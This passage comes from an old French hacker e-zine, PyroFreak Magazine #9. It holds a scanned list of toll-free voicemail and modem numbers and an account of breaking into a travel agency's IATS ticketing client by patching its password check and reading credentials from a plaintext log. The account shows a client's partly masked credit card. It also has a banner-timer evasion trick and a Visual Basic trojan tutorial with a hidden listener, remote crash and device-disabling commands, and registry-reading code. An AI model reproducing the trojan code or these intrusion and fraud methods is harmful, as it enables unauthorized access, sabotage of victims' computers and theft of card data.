1-800-451-1110-Cris de sonnerie Fucker apres un coup (Pas de réponse) 1-800-451-1111-Cie 1-800-451-1113-Cie Vmbs (2 digits for Extention) Audix 1-800-451-1115-Cie Vmb 1-800-451-1116-Cie Vmbs Meme type que 1-800-451-1118 1-800-451-1118-Cie Vmbs 1-800-451-1119-At&t Easy Reach 800 1-800-451-1120-Voix 1-800-451-1123-Paging system 1-800-451-1125-Mail Box 1-800-451-1127-Cie vmbs 1-800-451-1128-Cie =1-800-451-1127 1-800-451-1129-Pagett 1-800-451-1132-At&t Easy Reach 800 1-800-451-1134-VOIX 1-800-451-1139-Pas de réponse 1-800-451-1140-Pagett 1-800-451-1142-Cie 1-800-451-1144-VOIX 1-800-451-1145-Vmbs Audix 2002 1-800-451-1151-Modem 1-800-451-1153-Cie Vmbs 5403 5773 1-800-451-1156-Mail Box 1-800-451-1159-Mail Box 1-800-451-1160-VOIX 1-800-451-1161-Cie Mail Box 1-800-451-1162-Tonalité 1-800-451-1163-Mail box 1-800-451-1165-OQP 1-800-451-1166-Voix 1-800-451-1167-Mail box 1-800-451-1169-Modem 1-800-451-1170-Tonalité 1-800-451-1173-Cris d'affaire fucker encore (Fax/modem) 1-800-451-1174-Cris d'affaire fucker encore (Fax/modem) 1-800-451-1177-Pager 1-800-451-1180-Cie Vmbs 1-800-451-1181-OQP 1-800-451-1182-Mail Box 1-800-451-1183-Pager of Microsoft d'un employer (Flooder le en masse le cris) 1-800-451-1184-Cie 1-800-451-1185-At&t Easy Reach 800 00 1-800-451-1187-At&t Easy Reach 800 01 1-800-451-1188-Cie paging 1-800-451-1189-Invalide mais fucker 1-800-451-1190-Please enter your Paper extention 1-800-451-1192-Pagett 1-800-451-1193-Cie Voice Mail 1-800-451-1195-Mail box 1-800-451-1196-Cie 2000 Washington DC Voice mail 1-800-451-1197-Mail Box 1-800-451-1198-Enter the pine number you wish 1-800-451-1199-Modem fax fucker ben red A VOIR 1-800-451-33XX: 1-800-451-3301-Sonnerie étrange Pas de réponse 1-800-451-3304-Cie Vmbs 1-800-451-3307-Pas de réponse 1-800-451-3308-Voix 1-800-451-3310-Cie 1-800-451-3311-Voix 1-800-451-3314-Pas de réponse 1-800-451-3318-Cie Vmbs 2000 1-800-451-3320-Cie Mail Box 1-800-451-3321-Cie Mail Box 1-800-451-3322-Voix 1-800-451-3323-Cie Mail Box 1-800-451-3324-Voix 1-800-451-3332-Cie VanGuard 1-800-451-3337-Cie Vmbs 255 1-800-451-3342-Mail Box 1-800-451-3344-OQP 1-800-451-3345-Pas de réponse 1-800-451-3347-Phone mail system 1-800-451-3352-At&t Easy Reach 800 1-800-451-3353-Sonne un coup ensuite pu rien Bizzare 1-800-451-3354-OQP 1-800-451-3356-Cie Vmbs 1-800-451-3359-Voix 1-800-451-3363-Sonnerie Fucker-Microsox voice mail 1-800-451-3368-OQP 1-800-451-3369-Cie VMS 2000 1-800-451-3374-At&t Easy Reach 800 1-800-451-3376-VOIX 1-800-451-3378-At&t Easy Reach 800 00 2924845disconect 1-800-451-3383-Fax 1-800-451-3387-Pas de réponse 1-800-451-3391-Pas de réponse 1-800-451-3393-Cie 1-800-451-3396-Pas de réponse 1-800-451-22XX: 1-800-451-2200-Modem/Fax 1-800-451-2205-Voice Mail 1-800-451-2206-Cie Vmbs (Vielle Chienne qui Parle) Un vrai cris de systeme merdique 1-800-451-2207-Voice Mail 1-800-451-2208-OQP 1-800-451-2210-Voice Mail Message Center 1-800-451-2211-Cie Voice Mail 1-800-451-2216-Pas de réponse 1-800-451-2218-Cie Mail Box 1-800-451-2220-Sonnerie Fucker - Message 1-800-451-2222-Cie ... Air Line Voix 1-800-451-2227-Voix 1-800-451-2228-Cie - Voix 1-800-451-2230-Cie Mail Voice 1-800-451-2233-Cie Vmbs 1-800-451-2235-Meridian Mail VMS 1-800-451-2237-Cie Vmbs 1-800-451-2238-Francais Mail Box (Service en Francais) 1-800-451-2241-OQP 1-800-451-2247-Cie Vmbs 1-800-451-2248-Service... - Message 1-800-451-2249-Hello 1-800-451-2254-Cie vmbs 1-800-451-2255-Siren 1-800-451-2258-Pas de réponse 1-800-451-2262-Cie Mail Box 1-800-451-2266-Voix 1-800-451-2267-Shool Vmbs 412 405 261 1-800-451-2272-Voix 1-800-451-2273-Cie Mail box 1-800-451-2274-Cie Vmbs Audix 3 digits for extention 1-800-451-2280-Cie Vmbs Audix 1-800-451-2281-Cie Vmbs 1-800-451-2284-Micro system 1-800-451-2287-Double sonnerie - Pas de réponse 1-800-451-2290-Cie Mail Box 1-800-451-2293-At&t Easy Reach 800 1-800-451-2297-Tonalité 1-800-451-2298-Cie Mail Box (Pass 5 chiffres) Comme vous avez pu le constater, Cette liste contient 800 numéro 1-800 scanner a la main. NB: Les premiers scans sont moins exact que les derniers. J'ai pris de l'expérience dans le domaine durant ces scans, la est la raison. Pour conclure, si vous scanner vous aussi, faite nous parvenir vos logs, ca pourraient paraître dans le prochain # de PyroFreak.(pyrofreakmag@hotmail.com) Si vous voulez un modèle pour faire vos scans, j'ai inclus dans le .zip un fichier (1-8XX-XXX-XXXX.txt), a vous d'aller voir cela. Salut ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |12-Voler de ses propres ailes Part: 2 |( ) Phreak (X) Hack ( ) Autres '.__________Par LeMarquis ________ ______ __lemarquiz@yahoo.com ___ Après avoir explorer les mystères de la Sirev, certaines personnes penserons que nous avons dévoilé tout ce qui était possible sur les agents de voyage. La Lutte n'est cependant loin d'être fini, on voit apparaître partout sur le net d'autre carnassier comme la Sirev. Des capitalistes qui savent comment s'enrichir les poches sur le dos des consommateurs. Doréna- vant, il n'aura plus 2 intermédiaires, l'agent de voyage et le transporteur aérien, pour l'achat de billet d'avion mais un troisième qui verra le payement et la réservation. Je vous parlerais du cas de International Automated Ticket System (IATS) qui est une filiale de Ticketmaster Canada. TicketMaster est une grande entreprise compagnie qui se spécialise dans les services de billeterie et de transactions. Je ne peux m'empêcher de mention- ner que l'entreprise a son siège social à Vancouver et possède des bureaux à Toronto, Ottawa, Calgary et Edmonton. Bien sur, pour cette compagnie le Québec n'existe pas. La version française de sa page web nous le confirme, en nous proposons comme nouveauté la vieille version de leur logiciel. Je ne peux m'empêcher de partir en croisade contre cette sale compagnie. Et oui, IATS nous offre un logiciel de transaction et de réservation de vol. J'avais remarqué ce programme sur nos camarades agents de voyage. Je m'étais empressé de transféré toute leur dossier sur IATS. Le programme qui se trouvait là était pour Windows. Il semblait être compiler en Delphi. Quand on le part, on nous demande notre Agent Code, no- tre password et notre changement de password (si il a lieu). Agent Identification Agent Code : Password : Change to : Je fus assez embêter par ceci. Je n'avais pas trouver trace de ce code et de ce password dans le pwl de l'agent de bord. Il ne me restait qu'a patcher le programme. J'ai ressortit mes tools de mes temps de cracking et je l'ai décompilé le program. Juste avant la string « Error Wrong Password  », j'ai remplacer le JE par un JMP. Pour les non-inité : JE= Jump if equal, JMP= Jump. J'ai donc réussi a faire sauter le programme par dessus la deman- de d'authentification. Sauf, qu'après l'avoir passé le programme n'arrivait à faire aucun commande. C'était le serveur de l'IATS qui nous refusait. Après quelques sacres je me remis au travail... J'avais remarqué dans le dossier de IATS un fichier mystérieux : Air07.log. C'était le fichier de log de l'ancienne session de connexion de l'agent de voyage. A ma grande surprise je découvrit le code d'agent et le password en plain texte *. (Quelque peu de censure a été malheureusement nécessaire.) J'ai vérifié avec un sniffer si les transfert était encrypter, il semble que oui, mais le fichier de log est en plein text, trouver l'erreur ? 19:18:26 Winsock version required : 1.1 19:18:26 Winsock Version found: 1.1 19:18:28 Socket descriptor allocated : 1 19:18:28 Connecting to 207.167.201.59 19:19:00 socketsend:0100CODEPASSWORD 0 * 19:19:00 Socketrecv:00Hello from IATS Server 19:19:00 socketsend:1N00CODE F 19:19:01 Socketrecv:10CODE 19:19:01 socketsend:2200CODECODE 19:19:02 Socketrecv:20CLUB DE VOYAGES XXX MONTREAL (QUÉBEC) XXX XXX 19:19:05 socketsend:5O(c) 1997 IATS, All rights reserved. (1.13) L'intrusion était faite. Je rentrais dans un monde nouveau que je pourrais qualifier comme le paradis de tout carder. Je n'en suis pas un, mais l'information priviligié qui se trouve à mes yeux me donne l'eau à la bouche. Fiches de tous les clients de l'agence de voyage accessibles Achat en direct de vol Vérification de carte de crédit Les grandes entreprises sont friandes de voyage d'affaire pour leur employé, ils sont donc de gros clients des agents de voyage. En voici une qui se trouve dans la liste des clients de mon agence. Client Ref# : HQ Name : HYDRO-QUEBEC Company : HYDRO-QUEBEC Adress : 75, BOUL. RENE-LEVESQUE O., 12 City/Prov : MONTREAL Code Postal : H2Z 1A4 Credit Card Info Credit Card Number EXPIRY Primary : ENROUT 363XXX18751XXX 07/00 Second : Avec ce système je pourrait toujours me repayer un voyage à Moscou avec une Diablo à la sorti de mon hôtel mais je vous dispenserait de cette répétition inutile. La différence avec ce système et celui du Sirev est que nous avons ici accès au dossier des clients de l'agence de voyage. C'est comme si l'ensemble des clients de l'agence nous appartenait. Je trouve que le Sirev est sécure comparer à celui-ci. Il semble que plus l'on tombe dans le user-friendly, plus les réseaux se retrouve hacker-friendly... Référence : http://www1.ticketmaster.ca/IATS ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |13-Comment piraté la connexion gratuite de AltaVista et etc. |( ) Phreak ( ) Hack (X) Autres '.__________Par Cloud-Strife ________ ______ procra1@caramail.com ___ Avis, je ne suis par responsable de ce que vous allez faire avec le texte qui suit, je n'ai pas eu ces idées seuls et je ne l'ai jamais appliqué en pratique . Tout geste posé avec ce que je vais écrire ne découle pas de moi . Si vous n'êtes pas en accord avec cela, arrêtez de lire maintenant ! Avis #2 : Je veux pas qu'on me prenne pour un lame, mais j'ai traduis ce texte en francais a partir d'un site anglais. Mais bon, avec l'aide de Me-tho-D, j'ai rajouter quelques commentaires et critiques, donc BONNE LECTURE. La technique montrée ne s'applique pas selement à AltaVista mais à presque tous les systèmes de bannières présentes sue le net execpté médiabarre (http://www.mediabarre.com) car elle paye à la bannière visionée, non au temps quelle est ouverte . Pour altavista, cette technique enlève la limite de temps et la bannière . Bon, commençons : Pour débuter aller chercher un logiciel appelé windows sniper à www.unhuman.com . Après l'avoir installé, cliquez sur l'option "Parent" en haut et faites encapsulate . Prenez la mire et allez la porté sur le signe altavista au bas gauche de la bannière . À ce moment, l'étiquette grise affichera le texte #MyHome . Cliquez sur le boutton "Take window out" . La petite fenêtre disparaitera et une grande fenêtre apparaitera . Maintenant vérifiez si l'option Parent est toujours sélectionnée et sélectionez Hide windows . Emenez encore la mire sur le haut de la fenêtre et cliquez "Take window out" . Fremez le logiciel en cliquant oui aux 2 réponses et vous aurez une limite de temps illimité est vous n'aurez plus la bannière dans votre écran. Voici une autre adresse pour faire de l'argent qui fonctionne avec ce système ... CyberRider avait fait un exploit mais je préfère ce système car tu ne vois pas la bannière . Attention, pour les système de bannières, il faut faire pseudo hide pour que les bannières rentrent . Sinon ca fuck parce que les bannières rentrent pas dans votre ordi ... Autre adresse : http://www.gotoworld.com/getpaid/ Ce système à été testé sur altavista et gotoworld. Il fonctionne probable- mennt aussi sur alladvantage et les autres mais je ne les utilises pas. ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |14-Programmation de trojan |( ) Phreak ( ) Hack (X) Autres '.__________Par Cyberrider________ ______ cyberride@hotmail.com __ ___ NB Importante: Les *\(ce qui a ici doit etre sur la meme ligne )/* Raison: Pour une question de mise en page du magazine NB2: Cet article est plus ou moins corrigé (Manque de temps) Introduction ------------ Salut, je sais jamais quoi dire pour partir un article! Bon, puisque je voulais ecrire un article, pis que j'avais pas d'idée. ben jai décidé de parler de programmation en vb! wooow quel sujet palpitant lol! Mais par- ler de quoi! Bon, C'est alors que jai eu l'idée de plutot parler de progam- mation avec notre ami winsock! Mais par ici, je prendrai le ocx, car lister les api je suis trop lâche, c'est plus long plus compliquer pis la plupart auraient de la misère et meme moi j'perd pas mon temp avec sa!! bon , tant qu'à parler de winsock , ben dans mon article ca va se baser sur les trojan! , client/server biensur, bon une affaire au départ que les trojan on, c'est juste d'la criss de marde! Moi je trouve en tk, si je parle de cela, c'est juste pour parler de programmation! Mais au moins, si vous programmez votre propre trojan vous faites déjà moins dur!! C'est de la cris de marde si vous faîtes sa pour crasher des ordis etc"! Servez vous de votre tete et faîte en un pour capturer de bonnes informations!! C'est toujours bon en savoir plus sur une personne, surtout sur son ordi!!! Etablir les connection entre les pc! ------------------------------------ Ouvrez votre vb, ça va toujours mieux! ok on commence, aller inserer winsock.ocx dans votre project.. Une fois que c'est fait on va se mettre un textbox, on touche à rien des noms, on laisse tout ça comme c'est!! Et on se met un boutton qui va etre genre connect et un autre qui va etre déconnect! Ce qui veut dire command1 et command2 alors c'est fait, on a nos 2 bouton! Alors on click 2 fois sur notre super boutton connecter! Et vous allez entrez le tralala pour obtenir une connection! Alors je vous écris la source avec les commentaires dacc!! On verra comment faire le host après. Private Sub Command1_Click() on error resume next Dim Hostdi Dim port winsock1.close ' si il est déjà ouvert sa va planter! hosdi = text1.text port = 9000 *\(Winsock1.Connect Hostdi, port 'tous simplement un procédé très simple pour ce 'conencter au host!)/* End Sub Bon ceci etait une connection très simple la, vous êtes juste connecter, ca fais rien de plus, mais au moins on est connecter. Il n'y a pas d'error handler encore, c'est seulement le base de ce qu'on va voir pour la connec- tion. Alors maintenant on va ecrire la super source de notre 2 iem boutton, wow vous vous doutez deja quel sera énorme! alor on en parle pas plus et on la post!! Private Sub Command2_Click() Winsock1.Close End Sub wow ca c'est du stock, bon J'arrête dans parler! maintenant on est capable de se connecter et de se déconnecter! Mais si on y va de cette façon , à chaque fois que notre prog va se connecter a un ami :) qui na pas le bon host, bien a date le prog plante!!! Alors, c'est ici que le error handler apparaît! puisqu'il a deja une vers le ocx, nous sommes pas oubligé de tout le pro- grammer comme avec les api, simplement 3 lignes de code et le tour est joué. Notre prog ne crash pas il ferme seulement la connect! voila! */(Private Sub Winsock1_Error(ByVal Number As Integer, Description As String , ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) )\* MsgBox Description Winsock1.Close End Sub Vous avez juste à paster dans vos codes ;) ou aller paster les 2 liens de code dans le su derror de winsock! maintenant, si vous vous connectez à un non host, sa va marquer! error conenction forcefully rejected et fermer winsock au lieu de planter toute le prog. Je sais je parle beaucoup et le code n'avance pas c'est plate mais c'est ca! y'en a qui veulent des explications et y'en a qui sont presser comme moi, mais c'est pa grave, aller continuons! Bon la on peut se connecter, on peut se deconnecter, notre prog ne plante pas a date n est pa supposser sa puet arriver mais je sais pas comment vous faite a date! maintenant ce qu'il nous faut savoir, c'est envoyer! mais ke penser vous quon va envoyer?? surement un super code pis des packet udf pour crasher le system et des chose qui vont otus faire! non on fa simplement shooter des mot laite qui vont a voir un signification au host entk on verra sa en detail met qu'on code le host! bon alors un sub pourvoir envoyer! je paste ca direct, j'explique après! Sub send(func As String) On Error GoTo error: If Winsock1.RemoteHost = "" Then MsgBox "Hmmm essayer de se connecter serait une idée" Exit Sub Else Winsock1.SendData func End If Exit Sub error: MsgBox "hmmm t pas connecter!" End Sub Alors au lieu de repeter tout, tous tous jours la meme commande pour envoyer avec les meme chekc de connection, j'ai faîte un sub qui sera simple à utiliser! J'explique, si il y a une error , ca te dis que t'est pas connecté! A date c'est pas mal la seul error qui peut avoir si tu peut pas envoyer c'est parce que t'est pas connecter! Ensuite si tous est ok, ca shoot au host! Le sub sert juste a ne pas toujours répéter pour checker si t'est connecter. Alors si vous voulez shooter de quoi, tu le call de cette façon. Send "lemotclé" Ca va le shooté automatique!! bon c pomal cool! on peut se connecter deconneter et envoyé asteur vos recevoir nos donné sa c pomal facile a faire meton quon fait un trojan simple qui nous donne seulement de l'informations dans une text box!! Alors mettez vous une autre textbox qui va s'apeller text2 laisser sa comme sa!! bon on va aller dans le sub de winsock Data_arrival et on va y dir de recevoir quand ya du data qui arrive c genial non!! Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) Dim Ala As String Winsock1.GetData Ala Text2.Text = Ala End Sub ok comme vous voyez toute mes variables son as string c'est oubligatoire d'avoir des variables as string sinon sa marcheras pas. Ca va vous donnez des points dinterogation>! Maintenant vous pouvez recevoir ,shooter vous connecter! vous pouvez tout faire sauf que vous avez pas encore le host et aucune command a shooté hehehehe! donc cette petit parti n'était que pour monter un simple terminal, les commandes seront plus loins et à votre choix! Alors c'est tout pour monter le terminal (la base). Creation du serveur du host ou du trojan si vous aimer meiux! ------------------------------------------------------------- D'accord on a un terminal qui peut nous shooter de l info asteur faudrait bien un serveur qui recevera et executera une commande pour nous hehehehe! alors c est ici que nous commencons notre host! Premiere chose à penser pour le host il faut que la feuille de travail soit form1.visible =false sinon heheh vous aller voir le host c pas une bonne idée! aussi faudrait faire form1.showintaskbar = false jap sur c sa mais sa resemble a sa entk sa lenlevera de la bar de tache et de ctrl + alt + del aussi alors sa peut etre des chose a savoir! bon vous vous demander aussi surment comment le copier dans le c:\windows\system et de lexecuter a chaque ouverture! mais je en vous donnerez pas les source je vous dira comment faire mais plus tard vous le ferez vous meme! alors daccord ouvrez votre vb encor une fois et metter un winsock,ocx! c un debut c est tous se kon veut!! alons directement au code! au sub conenction request! voici se que nous allon ecrire dans notre sub jexplique apres! Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long) If Winsock1.State <> sckClosed Then Winsock1.Close Winsock1.Accept requestID send "connected" End Sub noublier pas ops jalalit oublier! dans sub form_load () winsock1.localport = 9000 winsock1.listen end sub ok cella sert a listener sur le port 9000 pour lec connection entrente!! jallais oublier!! Au début verifi si winsock est encore connecter! ensuite il accepte la request en winsock.accept requestid. C'est la seul façon d'accepter si t'accept pas, sa connect pas! Ensuite vous avez vus que j'ai utilisé la commande send "connected". Il serait bon de mettre le sub send dans ce projet aussi ;) voir plus haut! Alors vous shooter connected lorque vous êtes connecter, donc votre terminal recevra connected si la connection c'est bien derouler. C'est une bonne chose de faite! Maintenant s'agit juste de savoir recevoir et on a un très mais très grand pas de faite! Alors c'est ici qu'on va l'apprendre en regardant la super source et en lisant mes explications! Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) Dim Ala As String Winsock1.GetData Ala commandt ala End Sub On recoit bel et bien de la meme facon. Mais vous avez remarquer que j'ai rajouté à la fin le commandt ala. C'est ici que nous alons créer un sub nommé commandt, celui-ci va vérifier le contenant recu et faire quelque chose si il y a lieu. Alors ca va être très simple. Vous comprenez ce que se sub va faire, non oui non oui bon jexplique! ok avec votre terminal vous shooter "penis" ok le trojan recoit "penis" et fait commandt "penis" la command check C'est command la tombe sur la command penis et penis sa affiche un msgbox ta un ti penis! bon c'est une exemple ok la! alors c'est sa que commandt va faire, il execute les commandes selon celle shooter. Je ne ferrer pas un sub tous plein de commandes, les commandes qui seraient interresentes sont à la fin de cet article, il reste plein de tips à voir. bon comment faire le sub!! bin simple sub commandt (comm) dim comm if comm = "penis" then msgbox "Ta une tite keu!" end if if comm = "shut" then shell "c:\windows\rundll32.exe user.exe,exitwindows" end if end sub Bon la on a un sub avec 2 command, si tu shoot penis sa te msg box ta une tie que comme vous avez surement compris pis si tu shoot shut c'est censé fermer l'ordi! Alors vous avez catcher le principe?? C'est juste ca, c'est simple faire un trojan! Mais ce qu'il faut c'est les bonnes commandes à mettre dedans pour pouvoir tirer de l'informations de cet machine de merde! Alors c'est tout pour la basse du montage! Maintenant je vous laisse votre imagination pour monter le reste c'est quoi les commandes que vous allez shooter avec des boutton des list box mais c'est simple seulement en fesans la commande send "ayoye" entk!! Idée de commande et petite source que j'ai préparé! -------------------------------------------------- ok ici ma tite liste de command qu'il y a dans les trojans (la command et la source) fermer lordi! Shell "rundll32 user,exitwindows" Rebooter Shell "rundll32 shell32,SHExitWindowsEx 2" log off ous it aime meiux deconnection de lutilisateur Shell "rundll32 shell32,SHExitWindowsEx 0" si sa veut pas quitter un quittage de force du kernel ;) Shell "rundll32 krnl386.exe,exitkernel" le famuex swap des boutton de souris Shell "rundll32 user,swapmousebutton" disabler la souris Shell "rundll32 mouse,disable" disabler le keyboard Shell "rundll32 keyboard,disable" printer une page test on sen fou mais bon Shell "rundll32 msprint2.dll,RUNDLL_PrintTestPage" crasher lrodi tous court Shell "rundll32 user,disableoemlayer" Bon ce sont des petites command poche, sa c'est pour les trojans inuttiles , pour planter les ordi j'en donne pas plus!! Bon, je n'est pas fini avec mes exemples, une bonne facon de trouver des commandes, serait de retirer de l'information de la base de registre, mais la je n'est aucune idée d'info a retirer de la moi ;) Alors je vous donne seulement un beau petit bas file pour savoir vous connecter a la base de registre ;) Que je suis dont fin!! ;) Pour en savoir plus sa base de registre! taper regedit dans executer! bas rag.bas begin here;---- Public Const HKEY_CLASSES_ROOT = &H80000000 Public Const HKEY_CURRENT_USER = &H80000001 Public Const HKEY_LOCAL_MACHINE = &H80000002 Public Const HKEY_USERS = &H80000003 Public Const HKEY_PERFORMANCE_DATA = &H80000004 Public Const ERROR_SUCCESS = 0& ' Registry API prototypes Declare Function RegCloseKey Lib "advapi32.dll" (ByVal Hkey As Long) As Long */(Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long )\* */(Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String) As Long )\* */(Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal Hkey As Long, ByVal lpValueName As String) As Long)\* */(Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long )\* */(Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long )\* */(Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long)\* Public Const REG_SZ = 1 ' Unicode nul terminated string Public Const REG_DWORD = 4 ' 32-bit number Public Sub savekey(Hkey As Long, strPath As String) Dim keyhand& r = RegCreateKey(Hkey, strPath, keyhand&) r = RegCloseKey(keyhand&) End Sub Public Function getstring(Hkey As Long, strPath As String, strValue As String) Dim keyhand As Long Dim datatype As Long Dim lResult As Long Dim strBuf As String Dim lDataBufSize As Long Dim intZeroPos As Integer r = RegOpenKey(Hkey, strPath, keyhand) lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize) If lValueType = REG_SZ Then strBuf = String(lDataBufSize, " ") lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize) If lResult = ERROR_SUCCESS Then intZeroPos = InStr(strBuf, Chr$(0)) If intZeroPos > 0 Then getstring = Left$(strBuf, intZeroPos - 1) Else getstring = strBuf End If End If End If End Function */(Public Sub savestring(Hkey As Long, strPath As String, strValue As String , strdata As String) )\* Dim keyhand As Long Dim r As Long r = RegCreateKey(Hkey, strPath, keyhand) r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strdata, Len(strdata)) r = RegCloseKey(keyhand) End Sub */(Function getdword(ByVal Hkey As Long, ByVal strPath As String, ByVal strValueName As String) As Long )\* Dim lResult As Long Dim lValueType As Long Dim lBuf As Long Dim lDataBufSize As Long Dim r As Long Dim keyhand As Long r = RegOpenKey(Hkey, strPath, keyhand) ' Get length/data type lDataBufSize = 4 */(lResult = RegQueryValueEx(keyhand, strValueName, 0&, lValueType, lBuf, lDataBufSize) )\* If lResult = ERROR_SUCCESS Then If lValueType = REG_DWORD Then getdword = lBuf End If 'Else ' Call errlog("GetDWORD-" & strPath, False) End If r = RegCloseKey(keyhand) End Function */(Function SaveDword(ByVal Hkey As Long, ByVal strPath As String, ByVal strValueName As String, ByVal lData As Long))\* Dim lResult As Long Dim keyhand As Long Dim r As Long r = RegCreateKey(Hkey, strPath, keyhand) lResult = RegSetValueEx(keyhand, strValueName, 0&, REG_DWORD, lData, 4) 'If lResult <> error_success Then Call errlog("SetDWORD", False) r = RegCloseKey(keyhand) End Function Public Function DeleteKey(ByVal Hkey As Long, ByVal strKey As String) Dim r As Long r = RegDeleteKey(Hkey, strKey) End Function */(Public Function DeleteValue(ByVal Hkey As Long, ByVal strPath As String, ByVal strValue As String))\* Dim keyhand As Long r = RegOpenKey(Hkey, strPath, keyhand) r = RegDeleteValue(keyhand, strValue) r = RegCloseKey(keyhand) End Function end here------------------ Avec se bas vous pourrez obtenir de grandes informations! Mais si vous êtes un programmeur acharner et voulez mettre pas mal de command, ya un de m'est pot qui a faîte un bas file de malade. Lui y dit que c'est pour faire des trojans, tant qu'a moi, avec son bas file, tu peux faire tout ce que tu veux, pas juste des bas file! alors huh , je le fournis avec ce numéro de pyrofreak. Attention coeur sensible ce gars est une brute de la programmation!! winlice.bas begin here sti ------------ Inclus dans le .zip de ce numéro de PyroFreak sous le nom: winlice.bas Alors ceci complète ce petit article, qui j'espère vous aura plu. Salut ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |15-Philo 2000 |( ) Phreak ( ) Hack (X) Autres '.__________Par PaToFF ________ ______ patoff22@hotmail.com __ ___ Un Super titre n'est ce pas? Ouais j'aime bien la philosophie tout ce qui est de paradoxe, d'egnigme, revolution , satanisme...entk vous comprennez le genre? Non chu pas fou pis je ressemble pas trop a un sorcier, mais oui jaimerais que cette maudite societe change comme surement une bonne partie d'entre vous car si vous etes dans le Hack/Freak vous avez surement l'esprit ouvert et je suis pas sur que vous faites cette "activite" pour rien ou simplement que vous etes vraiment rendu pro (pas sur que vous liseriez ceci a moins que?) Alors tout ceu qui deteste les changements qui ont peur de lavenir que sont en grosse depression et qui veulent mourir et/ou tuer tout le monde vous pouvez peser sur quelques [Page Down]. Fianalement je vais essayer de vous faire un article qui cera asser divers je veux dire que je vais essayer de parler de plusieur sujet non pas vous tanner pendant 15 pages sur une tite theorie...malgrée que cest cool mais la je vais commencer par un commencement...! -- The Bug! -- Et oui le fameux bug. Avez vous hate de voir ce qui va ce passer tout ce qui va peter tout ce que les criss de media vont dire pour faire peur a la popu- lation ou un autre de ces stupides tactic. Non mais avez vous vu les conne- ries qu'ils ont pu raconter les vieux les jeunes le parent qui sont endormie par leur nouvelle par ces texte qui disent pour tous nous controller nous modeller oui ces eu qui on peur de nous et de ce qu'on pourraient faire. Et comme vous le saviez peut-etre il y a environ 1/3 du monde qui sont tres imbecile dont tres endormie dans cette societe lautre tier travail pour travailler autrement dit payer une maison avoir des enfants pis mourir, pour moi ca cest pas une vie, tk ca changeras surement pas celle de millier de personnes ca fais evoluer personne ca. Et la derniere partie ca resemble un peu a nous les hacker/freaker , terroriste, motard , tueur ..etc La plu- part n'agisse pas vraiment et la plupart on peur des repercution sur leur vie. Oui les tueurs et terroristes sont dans la categorie qui agissent mais si on parle du monde "normal" j'aime pas ce mot! du monde comme nous qui est sur la limite qui Cris endedans d'eux liberter et qui veulent simplement que ca change mais qui ne font presque rien qui ne se prennent pas vraiment en main ou plutot qu'on s'entraide pas et qu'on ne se connais pas vraiment peut-etre par Cyberlien mais en vain... Oui nous on doit ce reveiller et plus vite. Les années 2000 s'annoncent pour la libertée et tout ce qui est dans le style mediation ouverture d'esprit, etre mieu dans ca paux ouverture de conscience sur le 6eme sens , des millier de personnes vont surement se revolter sure- ment quelques un de leur geste sera exagerer mais pourquoi pas profiter de cette chance. En revenant un peu au "BuG!" cest cet element qui cera surement declancheur pour declancher ces emeute , ces secte et tout , oui une secte hehe le cristianisme en est une dans un sens mais une secte cest seulement une idee quon ce fais sur un sujet mais Enormement plus exagerer. Je sais pas si ce que je dit se tien mais ce que je veux dire cest qu'on doit faire quelque chose non? Moi jai pas le gout de faire une cristie de vie a a travailler a payer mon boss et que lui me donne une tite portion que je ne vois pas cette argent et que je la donne a des constructeur qui vont faire ma maison ou quelque chose que jaille une famile non je crois pas en vouloir une ca serais couper mon fil des idee, plutot m'endormir...j'ouvre une paren- these( jecoutais la "tele" lautre jour et lannonce disais clairement davoir des enfant que cetais le fun detre une mere et quil fallais avoir des enfant entk un autre moyen de modeler cette societe... ) Je crois que la vie est faite pour qu'on evolue que le monde sentraide a evoluer mais pas juste technologiquement que je parle psychologiquement meme si on a des vaissaux spatiaux ou plein daffaire du genre il faut etre quand meme un peu saint desprit etre en paix..peut-etre pourrons facilement faire de la telepathie (meme que ces facile) que l'hypnotisme devienne une habitude pouvoir montrer les images de notre tete a quelque dautre en lui touchant en tout cas tout ce que notre cerveau est doter et qui est nommer aujourdhui Occulte.! En fin de compte les gars, les filles faut pas avoir peur des autorité du gouver- nement tous etre solidaire (un peu comme mitnick koi?) et quand cela cera fais AGIR!!! -That Was Just a DREAM!!! Nooo...! -- Et pourquoi pas! si tout ce que vous faite cerais qu'un reve, ou encore comme la matrice un monde diriger par des robot, comme le 13etages un monde creer pour simulation..et dedans il y a encore des simulations..., comme Men In Black lunivers nest qu'une bille ou une pierre precieuse, ou encore qu'on soit seu- lement un jeux (simcity) non ya des chose qui ce prouvent peut-etre mais rien ne veux dire que cela est vrai comme un membre de Iga a dit: "notre monde est bati selon ce qu'on croit quil est." Et si tout ce qu'on entendire: le big- bang et tout ce tralala là netais que pour nous cacher la veriter. Et pouquoi aussi dans notre monde il y a des force de la nature plutot special le coter occulte comme je le dit dou vien la levitation voyage astral..etc nous somme aussi des esprits ... tout ca devien complexe de plus en plus que lon nomme les contexte et qu'on les mélange chaque religion a son fond de veriter cha- que personne a la 